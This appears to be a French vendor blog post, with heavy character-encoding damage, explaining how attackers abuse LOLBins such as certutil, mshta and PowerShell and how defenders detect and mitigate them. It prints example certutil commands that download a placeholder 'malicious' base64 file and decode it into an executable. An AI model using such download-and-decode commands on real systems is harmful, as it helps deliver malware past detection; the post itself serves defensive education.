Que sont les LOLBinsĀ ?
Table des matières :
Les LOLBins, Ć©galement connus sous le nom de « Living off the Land Binaries,Ā Ā» sont des binaires qui utilisent des commandes lĆ©gitimes et des exĆ©cutables prĆ©installĆ©s du systĆØme d’exploitation pour rĆ©aliser des activitĆ©s malveillantes. Les LOLBins utilisent les binaires du systĆØme local pour contourner les dĆ©tections, livrer des logiciels malveillants et rester indĆ©tectĆ©s. En utilisant les LOLBins, les adversaires peuvent amĆ©liorer leurs chances de rester inaperƧus en utilisant des services cloud lĆ©gitimes (GitHub, Amazon S3 storage, Dropbox, Google Drive, etc.) et des logiciels malveillants sans fichier.
Les acteurs malveillants ont tendance Ć appliquer cette tactique pendant les phases post-exploitation d’une attaque. Les Ć©quipes de sĆ©curitĆ© trouvent souvent qu’il est difficile d’identifier les LOLBins en raison de leur nature lĆ©gitime. Les attaquants utilisent les mĆŖmes binaires que ceux utilisĆ©s Ć des fins non malveillantes. C’est pourquoi il est important pour les organisations d’ĆŖtre conscientes des risques posĆ©s par les LOLBins et de prendre des mesures prĆ©ventives pour protĆ©ger leurs rĆ©seaux.
Comment les LOLBins peuvent-ils être utilisés pour des cyberattaques ?
Les LOLBins sont des exĆ©cutables locaux du systĆØme d’exploitation et souvent installĆ©s par dĆ©faut. Quelques exemples utilisĆ©s pour exĆ©cuter du code malveillant sont powershell.exe, certutil.exe, csc.exe, psexec.exe, etc. Un autre exemple populaire de LOLBin est CertReq.exe utilisĆ© par les hackers pour tĆ©lĆ©charger des malwares tout en Ć©vitant la dĆ©tection.
LOLBAS fournit plus d’informations sur les binaires, scripts et bibliothĆØques. En raison des outils prĆ©installĆ©s, les LOLBins laissent une trace minime lorsqu’ils atteignent leurs objectifs. Les acteurs malveillants ont tendance Ć utiliser les LOLBins pour
- Contourner les mesures de sĆ©curitĆ©: Les LOLBins permettent aux attaquants de contourner les mesures de sĆ©curitĆ© traditionnelles, car ces scripts sont considĆ©rĆ©s comme lĆ©gitimes par le systĆØme. Les attaquants peuvent exĆ©cuter du code malveillant sans alerter ou gĆ©nĆ©rer d’alertes de sĆ©curitĆ©. Par exemple, les adversaires contournent Windows Defender Application Control (WDAC) ou d’autres contrĆ“les applicatifs. Les acteurs malveillants peuvent Ć©galement tenter de contourner le Whitelisting des Applications (AWL). Une telle option consiste Ć utiliser mshta.exe pour exĆ©cuter du code JavaScript arbitraire (dans ce cas, mshta.exe est utilisĆ© pour exĆ©cuter un script depuis GitHub).
- Exécution furtive: Les attaquants peuvent utiliser les LOLBins pour masquer leurs activités malveillantes en les intégrant dans des processus légitimes. Cela rend difficile la différenciation entre un comportement système malveillant et normal.
- ĆlĆ©vation de privilĆØges: Les LOLBins permettent aux attaquants de Ć©lever leurs privilĆØges sur des systĆØmes vulnĆ©rables ou dĆ©jĆ compromis. Les adversaires peuvent obtenir un accĆØs vertical en exploitant des vulnĆ©rabilitĆ©s ou des erreurs de configuration dans ces scripts, ce qui leur donne plus de contrĆ“le sur le systĆØme cible. Une mĆ©thode courante consiste Ć contourner le contrĆ“le de compte utilisateur (UAC) pour Ć©lever les privilĆØges.
- Mouvement latéral: Les attaquants peuvent utiliser les LOLBins pour se déplacer latéralement et explorer différents systèmes et appareils. En exploitant des utilitaires système de base, les acteurs malveillants peuvent parcourir le réseau et identifier des cibles précieuses pour des attaques ultérieures.
- Exfiltration de donnĆ©es: Les LOLBins permettent aux adversaires d’exfiltrer des donnĆ©es sensibles Ć partir de systĆØmes attaquĆ©s. En exploitant des outils existants comme PowerShell or Bitsadmin, les pirates peuvent chiffrer, compresser et transfĆ©rer des donnĆ©es hors du rĆ©seau, contournant ainsi les mĆ©canismes traditionnels de prĆ©vention des pertes de donnĆ©es.
- ExĆ©cution de commande Ć distance: Les LOLBins permettent aux acteurs malveillants d’exĆ©cuter des commandes Ć distance sur des systĆØmes compromis, leur donnant ainsi le contrĆ“le et la permission de rĆ©aliser des activitĆ©s malveillantes. En utilisant des utilitaires comme PowerShell ou Windows Management Instrumentation Command-line (WMIC), les pirates peuvent envoyer des commandes pour exĆ©cuter des charges utiles supplĆ©mentaires afin de manipuler les paramĆØtres systĆØme.
Ceci est un exemple de comment les LOLBins sont utilisƩs pour les cyberattaques:
Source: talosintelligence.com
Qu’est-ce que Certutil? Comment peut-il ĆŖtre utilisĆ© ?
Certutil (Certificate Utility) est un outil en ligne de commande prĆ©installĆ© avec le systĆØme d’exploitation Microsoft Windows. Principalement, il est utilisĆ© pour gĆ©rer et manipuler les certificats et rĆ©aliser des opĆ©rations cryptographiques. Les administrateurs systĆØmes et les professionnels IT utilisent Certutil pour Ć©mettre, vĆ©rifier et rĆ©voquer des certificats. De plus, il est utilisĆ© pour gĆ©rer les tĆ¢ches liĆ©es au chiffrement, au dĆ©chiffrement et Ć la signature. Cependant, les adversaires peuvent aussi abuser de certutil.exe en tant que LOLBin pour des fins malveillantes.
Source : SentinelOne
Les attaquants peuvent exploiter Certutil de la maniĆØre suivante :
- DĆ©codage de fichiers: La capacitĆ© de Certutil to dĆ©coder et encoder des fichiers peut ĆŖtre abusĆ©e par des attaquants pour dissimuler des charges utiles malveillantes Ć l’intĆ©rieur de fichiers apparemment innocents. Cela rend trĆØs difficile pour les professionnels de la sĆ©curitĆ© de les dĆ©tecter en raison de leur nature non basĆ©e sur des signatures.
- Téléchargement et exécution: Certutil peut être utilisé pour télécharger des fichiers depuis des serveurs distants, ce que les attaquants peuvent utiliser pour télécharger et exécuter des logiciels malveillants ou du code arbitraire sur des systèmes vulnérables sans détection.
- Manipulation de certificats: Certutil permet aux attaquants de modifier des certificats, et en manipulant des certificats, les attaquants peuvent compromettre la sécurité du système en se faisant passer pour des entités légitimes ou en réalisant des attaques de type man-in-the-middle.
- Abus de la signature de code: Certutil peut signer des exƩcutables et des scripts avec des certificats numƩriques. Les attaquants peuvent exploiter cette fonctionnalitƩ pour signer des fichiers malveillants, les rendant apparents comme lƩgitimes et contournant ainsi les mƩcanismes de sƩcuritƩ reposant sur le whitelisting basƩ sur la confiance.
The Exploitation de Certutil peut commencer par des contournements de dĆ©tection et l’encodage du contenu du fichier (base64 dans l’exemple) :
certutil -urlcache -split āhttp://B64MALICIOUSFILE.txtā B64maliciousfile.txt
Maintenant, Certutil peut décoder le fichier malveillant localement. Cela signifie fondamentalement que vous avez un fichier malveillant non détecté sur votre système :
certutil -decode B64MaliciousFile.txt B64MalciousFile.exe
Comment dƩtecter une les LOLBins attaque de malware
Pour une dĆ©tection proactive de les LOLBins l’abus, SOC Prime Platform dispose d’une variĆ©tĆ© de rĆØgles Sigma enrichies en contexte. En cliquant sur le bouton Explorer les dĆ©tections , vous pouvez instantanĆ©ment accĆ©der aux dĆ©tections pertinentes qui sont cartographiĆ©es sur le cadre MITRE ATT&CK et sont compatibles avec 28 solutions SIEM, EDR, XDR et Data Lake.
les LOLBins sont difficiles Ć dĆ©tecter, mĆŖme si les adversaires se « cachent en pleine vueĀ Ā». Le profil lĆ©gitime des binaires rend beaucoup plus difficile pour les Ć©quipes de sĆ©curitĆ© de dĆ©tecter avec prĆ©cision les tentatives d’exploitation. En gĆ©nĆ©ral, les LOLBins ont la capacitĆ© de se camoufler dans les processus systĆØme normaux. Cependant, les organisations peuvent utiliser diffĆ©rentes stratĆ©gies et mesures de sĆ©curitĆ© pour amĆ©liorer leurs capacitĆ©s de dĆ©tection.
Source : Sapphire.net
Voici quelques méthodes qui vous aideront à détecter une les LOLBins attaque de malware :
- Analyse comportementale: En utilisant des solutions de sĆ©curitĆ© avancĆ©es basĆ©es sur des techniques d’analyse comportementale pour surveiller le comportement du systĆØme, vous pouvez rechercher des arguments de commande inhabituels, des connexions rĆ©seau inattendues ou un comportement de processus anormal. Si vous trouvez cela, cela pourrait indiquer l’utilisation de LOLBin.
- Analyse des journaux: Analyser les journaux systĆØme, y compris les journaux de commande en ligne, les journaux rĆ©seau et les journaux d’Ć©vĆ©nements pour des activitĆ©s basĆ©es sur des signatures. Faites attention aux arguments de commande inhabituels, Ć l’accĆØs excessif aux fichiers ou au rĆ©seau, ou aux processus initiĆ©s par les utilitaires LolBins .
- Surveillance de l’intĆ©gritĆ© des fichiers: En implĆ©mentant des outils de surveillance de l’intĆ©gritĆ© des fichiers, vous pouvez dĆ©tecter les modifications non autorisĆ©es des fichiers systĆØme critiques. De plus, vous pouvez rechercher toute introduction de nouveaux fichiers liĆ©s avec les LOLBins. Examinez tout changement des binaires, scripts et fichiers de configuration systĆØme pour tout signe d’activitĆ© malveillante.
- Surveillance du trafic rĆ©seau: Utilisez des outils de surveillance et d’analyse du trafic rĆ©seau pour identifier des communications rĆ©seau inhabituelles ou suspectes. Recherchez des connexions Ć des adresses IP ou domaines malveillants connus et toute transfert de donnĆ©es anormal pouvant indiquer une exfiltration de donnĆ©es.
- Analyse du comportement des utilisateurs et des entitĆ©s (UEBA) : Utilisez des solutions UEBA qui utilisent des algorithmes d’apprentissage automatique pour crĆ©er des lignes de base pour le comportement normal des utilisateurs et des systĆØmes. Cela aidera Ć dĆ©tecter les activitĆ©s anormales telles que des motifs d’exĆ©cution de commande inhabituels, un accĆØs anormal aux ressources ou des tentatives d’escalade de privilĆØges.
Comment attƩnuer une attaque de malware LolBins
Lutter contre une les LOLBins attaque est complexe et nĆ©cessite des stratĆ©gies globales et proactives. Les organisations peuvent minimiser les risques de les LOLBins en mettant en Åuvre les mesures de mitigation suivantes dans leur organisation :
- Autorisez uniquement les applications listĆ©es. Pour prĆ©venir l’utilisation non autorisĆ©e des binaires par des acteurs malveillants, les organisations peuvent utiliser des techniques de liste blanche des applications, qui restreignent l les LOLBins abus par des chemins connus et de confiance. Cependant, les Ć©quipes de sĆ©curitĆ© doivent chercher un Ć©quilibre entre la prĆ©vention des exploitations et la perturbation des activitĆ©s quotidiennes.
- Surveiller et conserver les journaux. AmĆ©liorez la dĆ©tection et l’analyse de l’utilisation des binaires les plus courants, y compris les arguments en ligne de commande, les opĆ©rations de fichiers et le trafic rĆ©seau.
- Utiliser des technologies de sĆ©curitĆ©. L’utilisation appropriĆ©e d’outils de sĆ©curitĆ© peut renforcer la posture de sĆ©curitĆ© globale d’une organisation. Vous pouvez envisager d’utiliser des outils de balayage web, la sĆ©curitĆ© de messagerie et des systĆØmes de prĆ©vention d’intrusion de nouvelle gĆ©nĆ©ration (NGIPS). De plus, une solution EDR peut aider les Ć©quipes de sĆ©curitĆ© Ć dĆ©tecter les activitĆ©s malveillantes Ć travers le rĆ©seau.
Source : sidechannel.blog
Les organisations peuvent rĆ©duire les risques associĆ©s aux LOLBin attaques de malware et amĆ©liorer leur posture de cybersĆ©curitĆ© globale en utilisant ces techniques de mitigation. Pour correctement combattre cette menace Ć©mergente, il est crucial d’adopter une stratĆ©gie proactive, de mettre continuellement Ć niveau les dĆ©fenses et de rester informĆ© des nouvelles LOLBin tactiques.
Restez en avance sur les menaces Ć©mergentes avec la plateforme SOC Prime pour la dĆ©fense cybernĆ©tique collective, tout en utilisant un kit d’outils de pointe qui s’appuie sur Sigma et MITRE ATT&CK pour renforcer la posture de cybersĆ©curitĆ© de l’organisation et assurer un avenir sĆ»r.